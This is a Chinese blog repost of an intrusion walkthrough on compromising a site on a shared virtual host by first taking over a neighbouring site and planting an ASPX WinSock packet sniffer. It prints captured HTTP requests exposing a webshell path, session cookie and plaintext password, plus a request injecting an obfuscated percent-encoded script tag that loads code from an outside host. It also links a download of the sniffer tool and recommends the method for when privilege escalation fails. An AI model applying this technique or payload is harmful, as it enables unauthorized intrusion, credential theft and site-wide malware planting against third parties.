最新消息:
    你的位置:jinglingshu的博客 > 别人经典渗透过程学习 > 通过WinSock嗅探虚拟主机拿下目标站

    通过WinSock嗅探虚拟主机拿下目标站

    别人经典渗透过程学习 admin 1833浏览 0评论

    是小白搞的,但是当时她没截图,所以我重新来的,时间就有点对不上,不过确实是这么个步骤哈
    首先是嗅探工具,asp的虚拟一般都支持aspx(少数不支持的忽略哈),那么用C#调用winsock嗅探下80端口、顺便连ftp和SMTP端口一起监听了吧。
    第一步,随便旁注拿下asp虚拟主机上的一个网站,上传aspx的工具(工具我下载链接在本文末尾)如图:

    1006151838ca582ca428ccdee2

    这个虚拟主机还算不错,才三分钟,就Packets: 260这么多包了
    一个通宵抓包,好了,该分析日志了。
    日志下载下来,因为虚拟主机,监听的是整个服务器,信息量太大,只能有选择的分析,搜索admin、pass、user、login等等有选择的看包。
    从抓包中发现,很多人在暴力猜解ftp密码。。。晕,这是何苦呢
    搜索admin这一关键词时有这么一个部分引起了我的注意,如图:

    10061518414dbd67913b95d624

    目录是admin下的文件,而且还有Cookie。。。很明显。呵呵
    再看往下:

    POST: /Admin/sent.asp HTTP/1.1
Via: 1.0 PROXY
Cookie: ASPSESSIONIDASQASTBB=JIBGEFDDOJIALLHIOMHNOMOG
Referer: http://www.91ri.org /Admin/sent.asp
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: www.cntansu.com
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: zh-cn
UA-CPU: x86
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 13
pass=buqiuren

    慢慢来看,无关的跳过了哈

    POST: /Admin/sent.asp

    发送指令到admin目录的sent.asp

    Cookie: ASPSESSIONIDASQASTBB=JIBGEFDDOJIALLHIOMHNOMOG

    这个不用解释了吧,用session,session似乎不能像Cookie那样欺骗,能我也不会

    Referer: http://www.91ri.org /Admin/sent.asp

    完整的url估计就是这个不错了,打开看看。居然是webshell
    这下就更省事了

    100615184806a6ce9f23574547

    好了,继续往下看:

    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

    反正不是我机器上的
    下面的越看越无聊,直接跳到最后:

    pass=buqiuren

    输入密码:buqiuren即可登录

    1006151850cfda2c2f5cdd2fc9

    下面就是批量清马,清理找webshell了
    PS:做人要积德,挂马盗号这样的无德无良的事情最好不要干,修复漏洞,留张条就行了。罪过啊罪过
    look,挂马的信息也抓出来了。。。。好无聊

    POST /Admin/sent.asp?Action=plgm&code=<script%20src=http://%25%37%39%2E%73%25%36%39%6E%25%36%31%25%33%31%25%33%36%33%25%32%45%25%36%39%25%36%45%66%25%36%46></script> HTTP/1.1
Via: 1.0 PROXY
Cookie: ASPSESSIONIDASQASTBB=JIBGEFDDOJIALLHIOMHNOMOG
Referer: http://www.cntansu.com/Admin/sent.asp?Action=plgm&code=<script%20src=http://www.91ri.org > /script>
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: www.91ri.org
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: zh-cn
UA-CPU: x86
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 153

    91ri.org:这是篇很老的文章了,其实从技术上来说没什么很有趣的东西,也挺老套的。之所以转载这篇文章是想给大家分享个思路:如果在旁注的 时候跨目录没权限,提权无望的情况下可以试试这种嗅探方式,可以嗅探到服务器上的ftp登录以及一些敏感信息,运气好时你嗅探到的信息将成为你拿下目标站 的关键key…

    sniffer aspx下载:http://pan.baidu.com/share/link?shareid=474204&uk=1325491136

    :这个shell是网上找的,手上没有shell就不测试了,手上有shell的下载下来测试一下效果,如果发现不能用可以留言,我另外台电脑里是有这个的可用版。

    link:http://bbs.blackbap.org/thread-1323-1-1.html

     

    转载请注明:jinglingshu的博客 » 通过WinSock嗅探虚拟主机拿下目标站

    与本文相关的文章

    发表我的评论
    取消评论

    表情

    Hi,您需要填写昵称和邮箱!

    • 昵称 (必填)
    • 邮箱 (必填)
    • 网址

    网友最新评论 (1)

    1. 经典的渗透思路,可以用来渗透虚拟主机。这上面只提供了aspx版本的sniffer,没有提供asp和php、jsp版的,因此,只能用于支持aspx的网站进行嗅探。
      admin11年前 (2014-04-05)回复